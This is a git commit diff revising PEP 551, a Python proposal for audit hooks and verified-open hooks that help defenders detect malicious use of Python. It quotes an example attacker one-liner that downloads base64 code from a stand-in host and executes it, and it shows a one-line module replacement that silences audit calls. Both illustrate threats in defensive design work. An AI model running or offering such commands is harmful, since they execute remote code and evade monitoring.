PEP 551 updates (#378)

* Rename "log hooks" to "audit hooks"
Add more hook locations
Improve recommendations regarding open_for_exec()

* Improves hooks for compile, exec, and code.__new__
Adds hook for pickle.find_class

* Fix ordering of code.__new__ arguments to match compile arguments.

* Combine type.__setattr__ event into object.__setattr__ and add __delattr__

* Adds rejected ideas.

* Fixes "from above" reference.
Steve Dower 2017-08-28 16:37:28 -07:00 committed by GitHub
parent b474b4f27f
commit 4f63a5935e
1 changed files with 211 additions and 104 deletions

@ -68,9 +68,9 @@ listed under `Further Reading`_.
Python is a particularly interesting tool for attackers due to its prevalence on
server and developer machines, its ability to execute arbitrary code provided as
data (as opposed to native binaries), and its complete lack of internal logging.
This allows attackers to download, decrypt, and execute malicious code with a
single command::
data (as opposed to native binaries), and its complete lack of internal
auditing. This allows attackers to download, decrypt, and execute malicious code
with a single command::
python -c "import urllib.request, base64; exec(base64.b64decode(urllib.request.urlopen('http://my-exploit/py.b64').read()).decode())"
@ -108,12 +108,12 @@ Generally, application and system configuration will determine which events
within a scripting engine are worth logging. However, given that the value of
many log events is not recognized until after an attack is detected, it is
important to capture as much as possible and filter views rather than filtering
at the source (see the No Easy Breach video from above). Events that are always
of interest include attempts to bypass event logging, attempts to load and
execute code that is not correctly signed or access-controlled, use of uncommon
operating system functionality such as debugging or inter-process inspection
tools, most network access and DNS resolution, and attempts to create and hide
files or configuration settings on the local machine.
at the source (see the No Easy Breach video from `Further Reading`_). Events
that are always of interest include attempts to bypass auditing, attempts to
load and execute code that is not correctly signed or access-controlled, use of
uncommon operating system functionality such as debugging or inter-process
inspection tools, most network access and DNS resolution, and attempts to create
and hide files or configuration settings on the local machine.
To summarize, defenders have a need to audit specific uses of Python in order to
detect abnormal or malicious usage. Currently, the Python runtime does not
@ -137,9 +137,9 @@ On Linux, some specific features that may be integrated are:
* OpenBSM [10]_
* syslog [11]_
* auditd [12]_
* SELinux labels [13]_
* check execute bit on imported modules
On macOS, some features that may be used with the expanded APIs are:
* OpenBSM [10]_
@ -154,8 +154,8 @@ Overview of Changes
===================
True security transparency is not fully achievable by Python in isolation. The
runtime can log as many events as it likes, but unless the logs are reviewed and
analyzed there is no value. Python may impose restrictions in the name of
runtime can audit as many events as it likes, but unless the logs are reviewed
and analyzed there is no value. Python may impose restrictions in the name of
security, but usability may suffer. Different platforms and environments will
require different implementations of certain security features, and
organizations with the resources to fully customize their runtime should be
@ -164,48 +164,49 @@ encouraged to do so.
The aim of these changes is to enable system administrators to integrate Python
into their existing security systems, without dictating what those systems look
like or how they should behave. We propose two API changes to enable this: an
Event Log Hook and Verified Open Hook. Both are not set by default, and both
require modifying the appropriate entry point to enable any functionality. For
the purposes of validation and example, we propose a new spython/spython.exe
Audit Hook and Verified Open Hook. Neither is set by default, and both require
modifications to the entry point binary to enable any functionality. For the
purposes of validation and example, we propose a new ``spython``/``spython.exe``
entry point program that enables some basic functionality using these hooks.
However, the expectation is that security-conscious organizations will create
their own entry points to meet their needs.
**However, security-conscious organizations are expected to create their own
entry points to meet their own needs.**
Event Log Hook
--------------
Audit Hook
----------
In order to achieve security transparency, an API is required to raise messages
from within certain operations. These operations are typically deep within the
Python runtime or standard library, such as dynamic code compilation, module
imports, DNS resolution, or use of certain modules such as ``ctypes``.
The new APIs required for log hooks are::
The new APIs required for audit hooks are::
# Add a logging hook
sys.addloghook(hook: Callable[str, tuple]) -> None
int PySys_AddLogHook(int (*hook)(const char *event, PyObject *args));
# Add an auditing hook
sys.addaudithook(hook: Callable[[str, tuple], None]) -> None
int PySys_AddAuditHook(int (*hook)(const char *event, PyObject *args));
# Raise an event with all logging hooks
sys.loghook(str, *args) -> None
int PySys_LogHook(const char *event, PyObject *args);
# Raise an event with all auditing hooks
sys.audit(str, *args) -> None
int PySys_Audit(const char *event, PyObject *args);
# Internal API used during Py_Finalize() - not publicly accessible
void _Py_ClearLogHooks(void);
void _Py_ClearAuditHooks(void);
Hooks are added by calling ``PySys_AddLogHook()`` from C at any time, including
before ``Py_Initialize()``, or by calling ``sys.addloghook()`` from Python code.
Hooks are never removed or replaced, and existing hooks have an opportunity to
refuse to allow new hooks to be added (adding a logging hook is logged, and so
preexisting hooks can raise an exception to block the new addition).
Hooks are added by calling ``PySys_AddAuditHook()`` from C at any time,
including before ``Py_Initialize()``, or by calling ``sys.addaudithook()`` from
Python code. Hooks are never removed or replaced, and existing hooks have an
opportunity to refuse to allow new hooks to be added (adding an audit hook is
audited, and so preexisting hooks can raise an exception to block the new
addition).
When events of interest are occurring, code can either call ``PySys_LogHook()``
from C (while the GIL is held) or ``sys.loghook()``. The string argument is the
When events of interest are occurring, code can either call ``PySys_Audit()``
from C (while the GIL is held) or ``sys.audit()``. The string argument is the
name of the event, and the tuple contains arguments. A given event name should
have a fixed schema for arguments, and both arguments are considered a public
API (for a given x.y version of Python), and thus should only change between
feature releases with updated documentation.
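The calling convention described above can be sketched as follows. This assumes an interpreter in which ``sys.addaudithook()`` and ``sys.audit()`` are available (they shipped in CPython 3.8); the event name ``example.load_plugin`` and its ``(path, trusted)`` schema are hypothetical and exist only for this illustration.

```python
import sys

seen = []  # (event, args) pairs captured by the hook


def record_example_events(event, args):
    # Each hook receives the event name and a tuple of arguments.
    # Only "example." events are kept here to keep the demo output small;
    # a production hook would record everything.
    if event.startswith("example."):
        seen.append((event, args))


sys.addaudithook(record_example_events)

# Hypothetical event: positional arguments arrive in the hook as one tuple.
sys.audit("example.load_plugin", "/opt/app/plugins/report.py", False)
```

Because hooks are never removed, the hook stays registered for the rest of the process, which is why the sketch does nothing except append to a list.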
When an event is logged, each hook is called in the order it was added with the
When an event is audited, each hook is called in the order it was added with the
event name and tuple. If any hook returns with an exception set, later hooks are
ignored and *in general* the Python runtime should terminate. This is
intentional to allow hook implementations to decide how to respond to any
@ -213,17 +214,17 @@ particular event. The typical responses will be to log the event, abort the
operation with an exception, or to immediately terminate the process with an
operating system exit call.
When an event is logged but no hooks have been set, the ``loghook()`` function
When an event is audited but no hooks have been set, the ``audit()`` function
should include minimal overhead. Ideally, each argument is a reference to
existing data rather than a value calculated just for the logging call.
existing data rather than a value calculated just for the auditing call.
As hooks may be Python objects, they need to be freed during ``Py_Finalize()``.
To do this, we add an internal API ``_Py_ClearLogHooks()`` that releases any
To do this, we add an internal API ``_Py_ClearAuditHooks()`` that releases any
``PyObject*`` hooks that are held, as well as any heap memory used. This is an
internal function with no public export, but it passes an event to all existing
internal function with no public export, but it triggers an event for all audit
hooks to ensure that unexpected calls are logged.
See `Log Hook Locations`_ for proposed log hook points and schemas, and the
See `Audit Hook Locations`_ for proposed audit hook points and schemas, and the
`Recommendations`_ section for discussion on appropriate responses.
Verified Open Hook
@ -267,17 +268,25 @@ Note that these handlers can import and call the ``_io.open()`` function on
CPython without triggering themselves.
If the handler determines that the file is not suitable for execution, it should
raise an exception of its choice, as well as performing any other logging or
notifications.
raise an exception of its choice, as well as raising any other auditing events
or notifications.
All import and execution functionality involving code from a file will be
changed to use ``open_for_exec()`` unconditionally. It is important to note that
calls to ``compile()``, ``exec()`` and ``eval()`` do not go through this
function - a log hook that includes the code from these calls will be added and
is the best opportunity to validate code that is read from the file. Given the
current decoupling between import and execution in Python, most imported code
will go through both ``open_for_exec()`` and the log hook for ``compile``, and
so care should be taken to avoid repeating verification steps.
function - an audit hook that includes the code from these calls will be added
and is the best opportunity to validate code that is read from the file. Given
the current decoupling between import and execution in Python, most imported
code will go through both ``open_for_exec()`` and the audit hook for ``compile``,
and so care should be taken to avoid repeating verification steps.
.. note::
The use of ``open_for_exec()`` by ``importlib`` is a valuable first defence,
but should not be relied upon to prevent misuse. In particular, it is easy
to monkeypatch ``importlib`` in order to bypass the call. Auditing hooks are
the primary way to achieve security transparency, and are essential for
detecting
API Availability
----------------
@ -287,45 +296,52 @@ behavior of the functions is implementation specific. The descriptions here
refer to the CPython implementation, and while other implementations should
provide the functions, there is no requirement that they behave the same.
For example, ``sys.addloghook()`` and ``sys.loghook()`` should exist but may do
nothing. This allows code to make calls to ``sys.loghook()`` without having to
For example, ``sys.addaudithook()`` and ``sys.audit()`` should exist but may do
nothing. This allows code to make calls to ``sys.audit()`` without having to
test for existence, but it should not assume that its call will have any effect.
(Including existence tests in security-critical code allows another vector to
bypass logging, so it is preferable that the function always exist.)
bypass auditing, so it is preferable that the function always exist.)
``os.open_for_exec()`` should at a minimum always return ``_io.open(pathlike,
'rb')``. Code using the function should make no further assumptions about what
may occur, and implementations other than CPython are not required to let
developers override the behavior of this function with a hook.
``os.open_for_exec(pathlike)`` should at a minimum always return
``_io.open(pathlike, 'rb')``. Code using the function should make no further
assumptions about what may occur, and implementations other than CPython are not
required to let developers override the behavior of this function with a hook.
Log Hook Locations
==================
Audit Hook Locations
====================
Calls to ``sys.loghook()`` or ``PySys_LogHook()`` will be added to the following
Calls to ``sys.audit()`` or ``PySys_Audit()`` will be added to the following
operations with the schema in Table 1. Unless otherwise specified, the ability
for log hooks to abort any listed operation should be considered part of the
for audit hooks to abort any listed operation should be considered part of the
rationale for including the hook.
.. csv-table:: Table 1: Log Hooks
.. csv-table:: Table 1: Audit Hooks
:header: "API Function", "Event Name", "Arguments", "Rationale"
:widths: 2, 2, 3, 6
``PySys_AddLogHook``, ``sys.addloghook``, "", "Detect when new log hooks are
being added."
``_PySys_ClearLogHooks``, ``sys._clearloghooks``, "", "Notifies hooks they
are being cleaned up, mainly in case the event is triggered unexpectedly.
This event cannot be aborted."
``PySys_AddAuditHook``, ``sys.addaudithook``, "", "Detect when new audit
hooks are being added."
``_PySys_ClearAuditHooks``, ``sys._clearaudithooks``, "", "Notifies hooks
they are being cleaned up, mainly in case the event is triggered
unexpectedly. This event cannot be aborted."
``Py_SetOpenForExecuteHandler``, ``setopenforexecutehandler``, "", "Detects
any attempt to set the ``open_for_execute`` handler."
"``compile``, ``exec``, ``eval``, ``PyAst_CompileString``", ``compile``, "
``(code, filename_or_none)``", "Detect dynamic code compilation. Note that
this will also be called for regular imports of source code, including those
that used ``open_for_exec``."
"``compile``, ``exec``, ``eval``, ``PyAst_CompileString``, ``PyAST_obj2mod``
", ``compile``, "``(code, filename_or_none)``", "Detect dynamic code
compilation, where ``code`` could be a string or AST. Note that this will be
called for regular imports of source code, including those that were opened
with ``open_for_exec``."
"``exec``, ``eval``, ``run_mod``", ``exec``, "``(code_object,)``", "Detect
dynamic execution of code objects. This only occurs for explicit calls, and
is not raised for normal function invocation."
``import``, ``import``, "``(module, filename, sys.path, sys.meta_path,
sys.path_hooks)``", "Detect when modules are imported. This is raised before
the module name is resolved to a file. All arguments other than the module
name may be ``None`` if they are not used or available."
``code_new``, ``code.__new__``, "``(bytecode, filename, name)``", "Detect
dynamic creation of code objects. This only occurs for direct instantiation,
and is not raised for normal compilation."
"``_ctypes.dlopen``, ``_ctypes.LoadLibrary``", ``ctypes.dlopen``, "
``(module_or_path,)``", "Detect when native modules are used."
``_ctypes._FuncPtr``, ``ctypes.dlsym``, "``(lib_object, name)``", "Collect
@ -342,12 +358,12 @@ rationale for including the hook.
trace functions. Because of the implementation, exceptions raised from the
hook will abort the operation, but will not be raised in Python code. Note
that ``threading.setprofile`` eventually calls this function, so the event
will be logged for each thread."
will be audited for each thread."
``PyEval_SetTrace``, ``sys.settrace``, "", "Detect when code is injecting
trace functions. Because of the implementation, exceptions raised from the
hook will abort the operation, but will not be raised in Python code. Note
that ``threading.settrace`` eventually calls this function, so the event
will be logged for each thread."
will be audited for each thread."
``_PyEval_SetAsyncGenFirstiter``, ``sys.set_async_gen_firstiter``, "", "
Detect changes to async generator hooks."
``_PyEval_SetAsyncGenFinalizer``, ``sys.set_async_gen_finalizer``, "", "
@ -379,9 +395,23 @@ rationale for including the hook.
``socket.getservbyport``, ``socket.getservbyport``, "``(port, protocol)``", "
Detect service resolution. The port argument is an int and protocol is a
str."
","
``type.__setattr__``","``(type, attr_name, value)``","Detect monkey patching
of types. This event is only raised when the object is an instance of
``type``."
"``_PyObject_GenericSetAttr``, ``check_set_special_type_attr``,
``object_set_class``",``object.__setattr__``,"``(object, attr, value)``","
Detect monkey patching of objects. This event is raised for the ``__class__``
attribute and any attribute on ``type`` objects."
``_PyObject_GenericSetAttr``,``object.__delattr__``,"``(object, attr)``","
Detect deletion of object attributes. This event is raised for any attribute
on ``type`` objects."
``Unpickler.find_class``,``pickle.find_class``,"``(module_name,
global_name)``","Detect imports and global name lookup when unpickling."
TODO - more hooks in ``_socket``, ``_ssl``, others?
* code objects
* function objects
SPython Entry Point
===================
@ -391,9 +421,9 @@ A new entry point binary will be added, called ``spython.exe`` on Windows and
example, as we expect most users of this functionality to implement their own
entry point and hooks (see `Recommendations`_). It will also be used for tests.
Source builds will create ``spython`` by default, but distributors may choose
whether to include ``spython`` in their pre-built packages. The python.org
managed binary distributions will not include ``spython``.
Source builds will build ``spython`` by default, but distributions should not
include it except as a test binary. The python.org managed binary distributions
will not include ``spython``.
**Do not accept most command-line arguments**
@ -411,32 +441,27 @@ used to initialize ``sys.path`` following the rules currently described `for
Windows <https://docs.python.org/3/using/windows.html#finding-modules>`_.
When built with ``Py_DEBUG``, the ``spython`` entry point will allow a ``-i``
option with no other arguments to enter into interactive mode, with log messages
being written to standard error rather than a file. This is intended for testing
and debugging only.
option with no other arguments to enter into interactive mode, with audit
messages being written to standard error rather than a file. This is intended
for testing and debugging only.
**Log security events to a file**
Before initialization, ``spython`` will set a log hook that writes events to a
local file. By default, this file is the full path of the process with a
Before initialization, ``spython`` will set an audit hook that writes events to
a local file. By default, this file is the full path of the process with a
``.log`` suffix, but may be overridden with the ``SPYTHONLOG`` environment
variable (despite such overrides being explicitly discouraged in
`Recommendations`_).
The log hook will also abort all ``addloghook`` events, preventing any other
hooks from being added.
On Windows, code from ``compile`` events will be submitted to AMSI [5]_ and if it
fails to validate, the compile event will be aborted. This can be tested by
calling ``compile()`` or ``eval()`` on the contents of the `EICAR test file
<http://www.eicar.org/86-0-Intended-use.html>`_.
The audit hook will also abort all ``sys.addaudithook`` events, preventing any
other hooks from being added.
**Restrict importable modules**
Also before initialization, ``spython`` will set an open-for-execute hook that
validates all files opened with ``os.open_for_exec``. This implementation will
require all files to have a ``.py`` suffix (thereby blocking the use of cached
bytecode), and will raise a custom log message ``spython.open_for_exec``
bytecode), and will raise a custom audit event ``spython.open_for_exec``
containing ``(filename, True_if_allowed)``.
On Windows, the hook will also open the file with flags that prevent any other
@ -446,6 +471,11 @@ modified between the check and use. Compilation will later trigger a ``compile``
event, so there is no need to read the contents now for AMSI, but other
validation mechanisms such as DeviceGuard [4]_ should be performed here.
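The suffix check and custom audit event described for ``spython`` might look roughly like the sketch below when written in Python. The function name ``open_for_exec_handler`` is hypothetical, the choice of ``OSError`` is an assumption (the text only says "an exception of its choice"), and the mechanism for registering the handler is not shown because it is set from the entry point. ``sys.audit()`` is assumed to be available (CPython 3.8 or later).

```python
import io
import os
import sys


def open_for_exec_handler(path):
    """Hypothetical handler: allow only ``.py`` files and audit the decision."""
    filename = os.fspath(path)
    allowed = filename.endswith(".py")
    # Raise the custom event with (filename, True_if_allowed) before deciding,
    # so that rejected attempts are visible to audit hooks as well.
    sys.audit("spython.open_for_exec", filename, allowed)
    if not allowed:
        raise OSError(f"execution of {filename!r} is not permitted")
    # Matches the minimum behaviour: return the file opened in binary mode.
    return io.open(filename, "rb")
```

Raising the audit event before the check fails means a denied file still leaves a record, in line with the recommendation to log before aborting.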
**Restrict globals in pickles**
The ``spython`` entry point will abort all ``pickle.find_class`` events that use
the default implementation. Overrides will not raise audit events unless
explicitly added, and so they will continue to be allowed.
Performance Impact
==================
@ -453,7 +483,7 @@ Performance Impact
**TODO**
Full impact analysis still requires investigation. Preliminary testing shows
that calling ``sys.loghook`` with no hooks added does not significantly affect
that calling ``sys.audit`` with no hooks added does not significantly affect
any existing benchmarks, though targeted microbenchmarks can observe an impact.
Performance impact using ``spython`` or with hooks added is not of interest
@ -482,7 +512,7 @@ particular, the entry point **should not** obtain any settings from the current
environment, such as environment variables, unless those settings are otherwise
protected from modification.
Log messages **should not** be written to a local file. The ``spython`` entry
Audit messages **should not** be written to a local file. The ``spython`` entry
point does this for example and testing purposes. On production machines, tools
such as ETW [7]_ or auditd [12]_ that are intended for this purpose should be
used.
@ -491,7 +521,8 @@ The default ``python`` entry point **should not** be deployed to production
machines, but could be given to developers to use and test Python on
non-production machines. Sysadmins **may** consider deploying a less restrictive
version of their entry point to developer machines, since any system connected
to your network is a potential target.
to your network is a potential target. Sysadmins **may** deploy their own entry
point as ``python`` to obscure the fact that extra auditing is being included.
Python deployments **should** be made read-only using any available platform
functionality after deployment and during use.
@ -502,30 +533,38 @@ example, Windows supports embedding signatures in executable files and using
catalogs for others, and can use DeviceGuard [4]_ to validate signatures either
automatically or using an ``open_for_exec`` hook.
Sysadmins **should** collect as many logged events as possible, and **should**
copy them off of local machines frequently. Even if logs are not being
constantly monitored for suspicious activity, once an attack is detected it is
too late to enable logging. Log hooks **should not** attempt to preemptively
filter events, as even benign events are useful when analyzing the progress of
Sysadmins **should** log as many audited events as possible, and **should** copy
logs off of local machines frequently. Even if logs are not being constantly
monitored for suspicious activity, once an attack is detected it is too late to
enable auditing. Audit hooks **should not** attempt to preemptively filter
events, as even benign events are useful when analyzing the progress of
an attack. (Watch the "No Easy Breach" video under `Further Reading`_ for a
deeper look at this side of things.)
Log hooks **should** write events to logs before attempting to abort. As
discussed earlier, it is more important to record malicious actions than to
prevent them.
Most actions **should not** be aborted if they could ever occur during normal
use or if preventing them will encourage attackers to work around them. As
described earlier, awareness is a higher priority than prevention. Sysadmins
**may** audit their Python code and abort operations that are known to never be
used deliberately.
On production machines, the first log hook **should** be set in C code before
``Py_Initialize`` is called, and that hook **should** unconditionally abort the
``sys.addloghook`` event. The Python interface is mainly useful for testing.
Audit hooks **should** write events to logs before attempting to abort. As
discussed earlier, it is more important to record malicious actions than to
prevent them.
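A minimal sketch of the "log first, then abort" ordering follows, assuming CPython 3.8 or later for ``sys.addaudithook()`` and ``sys.audit()``. The list ``audit_log`` stands in for a real sink such as ETW or auditd, and the event name ``example.debug_attach`` is hypothetical.

```python
import sys


def make_log_then_abort_hook(sink, forbidden):
    """Build a hook that records every event, then aborts forbidden ones."""
    def hook(event, args):
        sink.append((event, args))   # record first ...
        if event in forbidden:       # ... then decide whether to abort
            raise PermissionError(f"blocked by audit hook: {event}")
    return hook


audit_log = []  # stand-in for a real sink such as ETW or auditd
sys.addaudithook(make_log_then_abort_hook(audit_log, {"example.debug_attach"}))

try:
    sys.audit("example.debug_attach", 1234)  # hypothetical forbidden event
    aborted = False
except PermissionError:
    aborted = True
```

The exception raised by the hook propagates out of ``sys.audit()`` to the caller, so the operation is aborted while the record of the attempt is already in the log.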
To prevent log hooks being added on non-production machines, the entry point
**may** add a log hook that aborts the ``sys.addloghook`` event but otherwise
Sysadmins **should** identify correlations between events, as a change to
correlated events may indicate misuse. For example, module imports will
typically trigger the ``import`` auditing event, followed by an
``open_for_exec`` call and usually a ``compile`` event. Attempts to bypass
auditing will often suppress some but not all of these events. So if the log
contains ``import`` events but not ``compile`` events, investigation may be
necessary.
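As one illustration of such a correlation check, the sketch below flags a log that contains ``import`` events but no ``compile`` events. The function name and the representation of the log as a plain sequence of event names are assumptions made for this example; a real analysis would run over whatever format the logging system stores.

```python
from collections import Counter


def imports_without_compile(event_names):
    """Return True if the log has ``import`` events but no ``compile`` events."""
    counts = Counter(event_names)
    return counts["import"] > 0 and counts["compile"] == 0


suspicious = imports_without_compile(["import", "import", "exec"])
normal = imports_without_compile(["import", "compile", "exec"])
```

A positive result is only a prompt for investigation. Imports served from cached bytecode or native extension modules, for example, can legitimately occur without a matching ``compile`` event.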
The first audit hook **should** be set in C code before ``Py_Initialize`` is
called, and that hook **should** unconditionally abort the ``sys.addaudithook``
event. The Python interface is primarily intended for testing and development.
To prevent audit hooks being added on non-production machines, an entry point
**may** add an audit hook that aborts the ``sys.addaudithook`` event but otherwise
does nothing.
On production machines, a non-validating ``open_for_exec`` hook **may** be set
@ -534,8 +573,74 @@ overriding the hook, however, logging the ``setopenforexecutehandler`` event is
useful since no code should ever need to call it. Using at least the sample
``open_for_exec`` hook implementation from ``spython`` is recommended.
Since ``importlib``'s use of ``open_for_exec`` may be easily bypassed with
monkeypatching, an audit hook **should** be used to detect attribute changes on
type objects.
[TODO: more good advice; less bad advice]
Rejected Ideas
==============
Separate module for audit hooks
-------------------------------
The proposal is to add a new module for audit hooks, hypothetically ``audit``.
This would separate the API and implementation from the ``sys`` module, and
allow naming the C functions ``PyAudit_AddHook`` and ``PyAudit_Audit`` rather
than the current variations.
Any such module would need to be a built-in module that is guaranteed to always
be present. The nature of these hooks is that they must be callable without
condition, as any conditional imports or calls provide more opportunities to
intercept and suppress or modify events.
Given its nature as one of the most core modules, the ``sys`` module is somewhat
protected against module shadowing attacks. Replacing ``sys`` with a
sufficiently functional module that the application can still run is a much more
complicated task than replacing a module with only one function of interest. An
attacker that has the ability to shadow the ``sys`` module is already capable of
running arbitrary code from files, whereas an ``audit`` module can be replaced
with a single statement::
import sys; sys.modules['audit'] = type('audit', (object,), {'audit': lambda *a: None, 'addhook': lambda *a: None})
Multiple layers of protection already exist for monkey patching attacks against
either ``sys`` or ``audit``, but assignments or insertions to ``sys.modules``
are not audited.
This idea is rejected because it makes replacing the ``audit`` calls made by
all callers nearly trivial.
Flag in sys.flags to indicate "secure" mode
-------------------------------------------
The proposal is to add a value in ``sys.flags`` to indicate when Python is
running in a "secure" mode. This would allow applications to detect when some
features are enabled and modify their behaviour appropriately.
Currently there are no guarantees made about security by this PEP - this section
is the first time the word "secure" has been used. Security **transparency**
does not result in any changed behaviour, so there is no appropriate reason for
applications to modify their behaviour.
Both application-level APIs ``sys.audit`` and ``os.open_for_exec`` are always
present and functional, regardless of whether the regular ``python`` entry point
or some alternative entry point is used. Callers cannot determine whether any
hooks have been added (except by performing side-channel analysis), nor do they
need to. The calls should be fast enough that callers do not need to avoid them,
and the sysadmin is responsible for ensuring their added hooks are fast enough
to not affect application performance.
The argument that this is "security by obscurity" is valid, but irrelevant.
Security by obscurity is only an issue when there are no other protective
mechanisms; obscurity as the first step in avoiding attack is strongly
recommended (see `this article
<https://danielmiessler.com/study/security-by-obscurity/>`_ for discussion).
This idea is rejected because there are no appropriate reasons for an
application to change its behaviour based on whether these APIs are in use.
Further Reading
===============
@ -607,6 +712,8 @@ References
.. [12] `<http://security.blogoverflow.com/2013/01/a-brief-introduction-to-auditd/>`_
.. [13] SELinux access decisions `<http://man7.org/linux/man-pages/man3/avc_entry_ref_init.3.html>`_
Acknowledgments
===============